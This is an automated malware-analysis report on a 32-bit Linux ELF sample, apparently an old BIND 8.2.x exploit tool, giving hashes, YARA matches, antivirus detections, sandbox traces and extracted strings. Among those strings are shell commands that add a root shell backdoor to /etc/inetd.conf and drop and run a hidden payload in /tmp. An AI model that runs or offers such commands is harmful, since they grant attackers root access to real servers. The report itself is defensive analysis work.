Report #11712

Binary
ABI
ELFOSABI_SYSV
Size
7.32KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
2a8521489788127893ac662bb58e5607
sha1
c7992571a7529461a0075d20fb209817458537af
crc32
0x60025aff
sha224
ed7151f044c19ab9111180af7455b261d0808217595c4a55a0a816e7
sha256
244520589158f8304f7414584afe9ef8de0fb7970ca9c5bee3fcf656385a505a
sha384
ce335ad8b091df4f0dd861ce8cc6ed2912cf6e3626024d5faab83c5700c597be5a415eb6db78efcef58c4718d356fe62
sha512
66015316d6cabecc433c17abba93d67b4f8b2ff658f2184945ef0f9c81f802497c0fcd11c0c84d48f970de0340b6b6bdfe147e0622ed1774436deed8718c8b44
ssdeep
96:fehEp6IloO4HANNfAzjKmrWcSED0Ck8jTbo7PfNRG5sELR7ZmYxx04nnWD/iCX/x:fyIlhKKsWc/0CJTsjKZLJ3xe4nnWD/i
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, is__elf, IP, contentis_base64, Misc_Suspicious_Strings

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc

Password

Suspicious
False
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3
URLs
/lib/ld-linux.so.2, ld-linux.so.2, copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
Mails

Suspicious
True
Strings
List
.rel.got
copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/
echo ingreslock stream tcp nowait root /bin/sh sh -i >>/etc/inetd.conf; (/usr/sbin/inetd &); exit;
libc.so.6
ld-linux.so.2
.rel.plt
.rel.bss
/lib/ld-linux.so.2
(sleep 30; kill -9 %d >/dev/null 2>&1) &
system seems to be running bind 8.2.x on a linux
usage: %s address [-s][-e]
frame ptr is too low to be successfully exploited
frame ptr=0x%08x adr=%08x ofs=%d
cd /tmp; mkdir .tmp; cd .tmp; echo %s >d0; chmod +x d0; (./d0 >/dev/null 2>&1 &); exit;
inet_addr
stack dump:
port=%04x connected!
system does not seem to be a vulnerable linux
gethostbyname
connect
sleep
socket
fopen
fread
system
send
.hash
-s send infoleak packet
-e send exploit packet
.comment
_GLOBAL_OFFSET_TABLE_
_DYNAMIC
_environ
.dynamic
__environ
__gmon_start__
__errno_location
.shstrtab
__libc_init_first
_IO_stdout_
.rodata
.interp
__bss_start
/bin/sh
01.01
01.01
01.01
01.01
01.01
.strtab
.symtab
environ
sockmod
_edata
_etext
_init
.init
.fini
_fini
.dynsym
.dynstr
.ctors
.dtors
_start
getpid
ioctl
getopt
close
write
.got
_end
read
%s%02x

bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
GCC: (GNU) 2.7.2.3
error
htons
getsockname
sprintf
perror
atexit
memset
.data
printf
strlen
memcpy
fflush
ntohs
exit
sent!
.note
bzero
PPRV
.plt
.text

Symbols
List

Number
0
Reason
Stripped
Suspicious
True
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .interp, .hash, .dynsym, .dynstr, .rel.got, .rel.bss, .rel.plt, .init, .plt, .text, .fini, .rodata, .data, .ctors, .dtors, .got, .dynamic, .bss, .comment, .note, .shstrtab
Number
22
Suspicious
False
Segments
Number
5
Suspicious
False
Compilers
List
GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3, GCC: (GNU) 2.7.2.3
Identified
5
Suspicious
True
Functions
List
__gmon_start__, _DYNAMIC, _GLOBAL_OFFSET_TABLE_, _fini, _init, __libc_init_first, __errno_location, fflush, memcpy, fopen, memset, exit, atexit, system, _IO_stdout_, printf, sprintf, perror, fread, strlen, bzero, sleep, getpid, close, getopt, htons, _environ, read, write, ioctl, socket, connect, getsockname, send, ntohs, gethostbyname, inet_addr, __environ, environ, _start, _etext, _edata, __bss_start, _end
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x80489bc
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
5
Offset
52
Section Header
Size
40
Number
22
Offset
6620
AVclass
tsig
1
VirusTotal
md5
2a8521489788127893ac662bb58e5607
sha1
c7992571a7529461a0075d20fb209817458537af
SCANS (DETECTION RATE = 45.76%)
AVG
update: 20200920
version: 18.4.3895.0
detected: False

CMC
update: 20200920
version: 2.7.2019.1
detected: False

MAX
result: malware (ai score=100)
update: 20200920
version: 2019.9.16.1
detected: True

Bkav
update: 20200919
version: 1.3.0.9899
detected: False

K7GW
update: 20200920
version: 11.141.35285
detected: False

ALYac
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 1.1.1.5
detected: True

Avast
update: 20200920
version: 18.4.3895.0
detected: False

Avira
update: 20200920
version: 8.3.3.8
detected: False

Baidu
update: 20190318
version: 1.0.0.2
detected: False

Cynet
update: 20200917
version: 4.0.0.24
detected: False

Cyren
update: 20200920
version: 6.3.0.2
detected: False

DrWeb
update: 20200920
version: 7.0.49.9080
detected: False

GData
result: Trojan.Linux.GenericA.12227
update: 20200920
version: A:25.27080B:27.20234
detected: True

Panda
update: 20200920
version: 4.6.4.2
detected: False

VBA32
update: 20200918
version: 4.4.1
detected: False

VIPRE
update: 20200920
version: 86830
detected: False

Zoner
update: 20200919
version: 0.0.0.0
detected: False

Comodo
result: Malware@#1v4vd6dc3zqnm
update: 20200920
version: 32827
detected: True

Ikarus
result: Trojan.Linux.Exploit
update: 20200920
version: 0.1.5.2
detected: True

McAfee
result: Linux/Exploit-Bind.a
update: 20200920
version: 6.0.6.653
detected: True

Rising
update: 20200920
version: 25.0.0.26
detected: False

Sophos
result: Linux/Loit-C
update: 20200920
version: 4.98.0
detected: True

Yandex
update: 20200911
version: 5.5.2.24
detected: False

Zillya
result: Trojan.Small.Linux.39
update: 20200919
version: 2.0.0.4178
detected: True

Arcabit
result: Trojan.Linux.GenericA.D2FC3
update: 20200920
version: 1.0.0.881
detected: True

FireEye
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 32.36.1.0
detected: True

Sangfor
result: Malware
update: 20200814
version: 1.0
detected: True

TACHYON
update: 20200920
version: 2020-09-20.02
detected: False

Tencent
update: 20200920
version: 1.0.0.1
detected: False

ViRobot
update: 20200920
version: 2014.3.20.0
detected: False

Ad-Aware
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 3.0.16.117
detected: True

AegisLab
result: Hacktool.Linux.Tsig.3!c
update: 20200920
version: 4.2
detected: True

F-Secure
update: 20200920
version: 12.0.86.52
detected: False

Fortinet
result: Linux/Hijack.A!worm
update: 20200920
version: 6.2.142.0
detected: True

Invincea
result: Linux/Loit-C
update: 20200920
version: 1.0.1.0
detected: True

Jiangmin
result: HackTool.Linux.fr
update: 20200920
version: 16.0.100
detected: True

Kingsoft
update: 20200920
version: 2013.8.14.323
detected: False

Symantec
result: Trojan.Gen.2
update: 20200919
version: 1.12.0.0
detected: True

AhnLab-V3
update: 20200920
version: 3.18.1.10026
detected: False

Antiy-AVL
update: 20200920
version: 3.0.0.1
detected: False

Kaspersky
result: HackTool.Linux.Tsig.a
update: 20200920
version: 15.0.1.13
detected: True

MaxSecure
update: 20200919
version: 1.0.0.1
detected: False

Microsoft
update: 20200920
version: 1.1.17400.5
detected: False

Qihoo-360
result: Linux/Trojan.Hacktool.c09
update: 20200920
version: 1.0.0.1120
detected: True

ZoneAlarm
result: HackTool.Linux.Tsig.a
update: 20200920
version: 1.0
detected: True

ESET-NOD32
result: a variant of Linux/Exploit.Small.CZ
update: 20200920
version: 22020
detected: True

TrendMicro
result: TROJ_GEN.R002C0PIC20
update: 20200920
version: 11.0.0.1006
detected: True

BitDefender
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 7.2
detected: True

K7AntiVirus
update: 20200920
version: 11.141.35285
detected: False

SentinelOne
result: DFI - Malicious ELF
update: 20200724
version: 4.4.0.0
detected: True

Avast-Mobile
update: 20200920
version: 200920-00
detected: False

Malwarebytes
update: 20200920
version: 3.6.4.335
detected: False

TotalDefense
update: 20200920
version: 37.1.62.1
detected: False

CAT-QuickHeal
update: 20200919
version: 14.00
detected: False

NANO-Antivirus
result: Trojan.Elf32.NixC.cmpmo
update: 20200920
version: 1.0.134.25140
detected: True

BitDefenderTheta
update: 20200918
version: 7.2.37796.0
detected: False

MicroWorld-eScan
result: Trojan.Linux.GenericA.12227
update: 20200920
version: 14.0.409.0
detected: True

SUPERAntiSpyware
update: 20200918
version: 5.6.0.1032
detected: False

TrendMicro-HouseCall
result: TROJ_GEN.R002C0PIC20
update: 20200920
version: 10.0.0.1040
detected: True

total
59
sha256
244520589158f8304f7414584afe9ef8de0fb7970ca9c5bee3fcf656385a505a
scan_id
244520589158f8304f7414584afe9ef8de0fb7970ca9c5bee3fcf656385a505a-1600601940
resource
2a8521489788127893ac662bb58e5607
positives
27
scan_date
2020-09-20 11:39:00
verbose_msg
Scan finished, information embedded
response_code
1
Ltrace
Trace

Strace
Trace
4291  execve  "./malware"  ["./malware"]  -1 ENOENT (No such file or directory)
4291  write  2  "strace: exec: No such file or di"...  40  40
4291  exit_group  1  ?

Analysis
Ltrace
Statically-compiled samples cannot be ltraced.

Reason
Timeout

Status
Success

Strace
Success

Results
True

DNS
Query

Response

TCP
Info

UDP
Info

HTTP
Info

Summary
DNS
False

TCP
False

UDP
False

HTTP
False

Binary
RF
confidence: 77.52%
suspicious: True
MLP
confidence: 83.69%
suspicious: True
SVM
confidence: 74.05%
suspicious: True